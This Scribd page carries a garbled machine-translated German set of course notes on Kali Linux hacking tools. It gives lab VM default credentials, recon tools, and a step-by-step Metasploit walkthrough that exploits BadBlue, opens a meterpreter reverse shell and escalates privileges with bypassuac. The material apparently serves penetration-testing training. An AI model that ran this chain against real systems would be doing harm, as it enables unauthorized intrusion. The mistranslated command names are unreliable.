0% fanden dieses Dokument nützlich (0 Abstimmungen)
8 Ansichten3 Seiten

Kali Linux

Dieses Dokument enthält Anweisungen zur Verwendung verschiedener Hacking-Tools wie Kali Linux, Metasploit, Nmap usw. Es umfasst grundlegende Befehle für jedes Tool sowie Beispiele dafür, wie man Geräte scannt, Schwachstellen wie BadBlue ausnutzt und Privilegien erhöht. Es beschreibt auch kurz Tools zur Informationsbeschaffung wie Recon-ng, TheHarvester und zur Verschlüsselung von Passwörtern wie Ophcrack und Crackstation.

Übersetzt von

ScribdTranslations
Copyright
© All Rights Reserved
Wir nehmen die Rechte an Inhalten ernst. Wenn Sie vermuten, dass dies Ihr Inhalt ist, beanspruchen Sie ihn hier.
Verfügbare Formate
Als PDF, TXT herunterladen oder online auf Scribd lesen
0% fanden dieses Dokument nützlich (0 Abstimmungen)
8 Ansichten3 Seiten

Kali Linux

Dieses Dokument enthält Anweisungen zur Verwendung verschiedener Hacking-Tools wie Kali Linux, Metasploit, Nmap usw. Es umfasst grundlegende Befehle für jedes Tool sowie Beispiele dafür, wie man Geräte scannt, Schwachstellen wie BadBlue ausnutzt und Privilegien erhöht. Es beschreibt auch kurz Tools zur Informationsbeschaffung wie Recon-ng, TheHarvester und zur Verschlüsselung von Passwörtern wie Ophcrack und Crackstation.

Übersetzt von

ScribdTranslations
Copyright
© All Rights Reserved
Wir nehmen die Rechte an Inhalten ernst. Wenn Sie vermuten, dass dies Ihr Inhalt ist, beanspruchen Sie ihn hier.
Verfügbare Formate
Als PDF, TXT herunterladen oder online auf Scribd lesen

KALI LINUX, wenn beim Öffnen der virtuellen Maschine ein Fehler auftritt, müssen wir nur in das

Setup und aktivieren wir die technologische Virtualisierung und fertig. Zum Eingeben verwenden wir Benutzer = root und die
Das Passwort ist =toor.

Comandos:

BEFEHLE BESCHREIBUNG
Pwd Zeige, in welchem Verzeichnis wir uns befinden
Cd Änderung des Verzeichnisses
Mkdir Ein Verzeichnis erstellen
Ls (Parameter -a) Erlaubt das Auflisten von Verzeichnissen

Cp Erlaubt das Kopieren von Dateien


Mv Dateien verschieben oder umbenennen
Teer Um Dateien zu komprimieren/dekomprimieren, Kopien
von Sicherheit
Rm Befehl zum Löschen einer Datei
Katze Ermöglicht die Anzeige von Dateien
Klar Reinige den Bildschirm
Passwort Es wird verwendet, um das Passwort eines Benutzers zu ändern.
Chmod Berechtigungen für Dateien
./namen_skript Um ein Skript auszuführen
nano Um einen Textgenerator zu aktivieren
Ifconfig oder netstat IP-Adresse erfahren
Lokalisieren Dateien suchen
Rdesktop IP-Adresse Ingresar al equipo

METASPLOITABLE: wir laden es in die virtuelle Maschine, in diesem Fall VMWARE, und starten mit dem Benutzer:
msfadmin und das Passwort: msfadmin.

OWASPBWP: dient dazu, Angriffe auf Webanwendungen durchzuführen, wir laden es auf die virtuelle Maschine.
In diesem Fall VMWARE beginnen wir mit dem Benutzer: root und dem Passwort: owaspbwa.

GOOGLE HACKING: Mit Google können wir genauere Abfragen mit einigen durchführen
Suchoperatoren.

BETREIBER DESCRIPCION
Im Titel Erlaubt die Suche nach Schlüsselwörtern im Titel der Seite
Allintitle Ähnlich wie das vorherige, aber für mehrere Wörter
Inurl Schlüsselwort für die URL
Site Filtern Sie eine Suche nur auf einer Website-Domain
Ext oder Dateityp Suche nach Erweiterungen oder einer bestimmten Datei (wie
ein PDF, DOCX, usw.
Allintext Schlüsselwortsuche
Link Externe Links zu einer Seite
RECON-NG: es ist ein Werkzeug, das es ermöglicht, Informationen zu sammeln, es ist bereits in Kali installiert.
Linux.
DERERNTEM: Es ist ein Skript, das in Python entworfen wurde und dient dazu, Informationen wie (E-Mails, zu sammeln.
Subdomänen, Hots, Mitarbeiter).

COMANDOS DESCRIPCION
-D DOMÄN ZU SUCHEN ODER NAME
-B DATEN IN SUCHMASCHINEN SUCHEN
-L DIE MENGE BEGRENZEN, DIE WIR WOLLEN
-H USAR SHODAN

beispielsyntax: theharvestar
Theharvester -d [Link] -l 1000 -b alle -h

CEWL: es ein Skript, das in Ruby erstellt wurde und dient dazu,

METASPLOIT

NMAP

JHON RIPPER

NESSUS

WIRESHARK

OPHCRACK
SHODAN: Suchmaschine, die sich auf mit dem Internet verbundene Geräte konzentriert, zum Beispiel Kameras,
Webcams, usw.
PASSWORTANGRIFFE

NETCRAFT: Suchmaschine, die dabei helfen kann, interne Informationen zu finden. ARL-Suchen.

Ingresamos a Kali Linux Comando paraatacar “nmap-sS [Link]” y presionamos enter, con
Mit diesem Befehl identifizieren wir die offenen Stellen, die das Team hat, das wir angreifen möchten.
"nmap -sS [Link] -sV -p 21,80" dieser Befehl hilft uns, die Protokolle zu identifizieren und welche
Version verwendet die Ports 21 und 80 zum Beispiel (FileZilla FTP, BadBlue HTTP 2.7), die ...
Sie sind auf diesem Gerät geöffnet. Danach können wir nach Schwächen dieser genannten suchen.
Marken im Internet. Um den Angriff zu starten, öffnen wir Metasploit und suchen nach dem schädlichen Code.
für die Marke badblue, mit dem Befehl „search badblue“ suchen wir hier bereits die Exploits, die
Wir können in unserem Fall den zweiten verwenden und der Befehl wäre „use“.
exploit/Windows/http/badblue_passthru" und drücken die Eingabetaste, dann geben wir den Befehl ein
„Optionen anzeigen“ hier werden uns die Optionen angezeigt, dann geben wir die gewünschte IP-Adresse ein.
angegriffen mit dem Befehl „set rhost [Link]“ und drücken Sie die Eingabetaste, dann geben wir einen anderen ein
Befehl „set payload Windows/meterpreter/reverse_tcp“ und drücke Enter. Damit gebe ich an, dass
Injiziere einen Meterpreter-Code, damit sie mir eine Antwort sendet, wir geben den Befehl ein.
„Optionen anzeigen“ hier wird mir zeigen, über welchen Port ein Rückgabepunkt des Angriffs erfolgt.
zum Beispiel (4444), gebe ich den Befehl "ifconfig" ein, der mir meine Informationen anzeigen wird, wie
IP-Adresse Subnetzmaske, dann geben wir den Befehl „set lhost [Link]“ ein und
wir drücken Enter, dann suchen wir nach dem Port, den wir eingegeben haben, indem wir den Befehl "set" verwenden
lport 4444" und drücken Enter, dann geben wir den Code "show options" ein und drücken
Geben Sie ein, dann geben wir den Befehl "exploit" ein und drücken die Eingabetaste. Danach wird uns eine angezeigt.
Shell in diesem Fall war meterpreter, dann gaben wir den Befehl „help“ ein und drückten hier die Eingabetaste.
Wir können sehen, auf was wir Zugriff haben, zum Beispiel auf die Kamera usw. Dann geben wir ein
Befehl „sysinfo“ drücken wir die Eingabetaste hier können wir sehen, welches Betriebssystem das Gerät verwendet
a angreifen, dann geben wir den Befehl „shell“ ein und geben erneut den Befehl ein
"mkdir arnold" und nur durch Eingabe des Befehls dir können wir die Informationen der Festplatte C: anzeigen.
wir kehren mit dem Befehl "exit" in die Meterpreter-Shell zurück, wir geben den Befehl "background" ein und
Geben Sie dann den Befehl „search bypassuac“ ein, hier werden uns einige Optionen dieses Befehls angezeigt.
In diesem Fall wählen wir den ersten, der Befehl lautet „use exploit/Windows/local/bypassuac“ Enter
und ein weiterer Befehl, den wir bereits verwendet haben, "set payload Windows/meterpreter/reverse_tcp" eingeben "show

Optionen" geben "Sitzungen" ein, was uns zeigt, welche Sitzungen auf diesem Gerät aktiv sind.

TCH-HYDRA: anwendungsorientiert durch Befehle und grafische Form, um Benutzer zu kombinieren und
Passwörter.

OPHCRACK: Anwendung zum Auffinden von Hashes in den Windows-Versionen.

[Link]: es ist eine Online-Seite, die uns helfen kann, wenn es darum geht, die
Passwörter mit Hash.

Das könnte Ihnen auch gefallen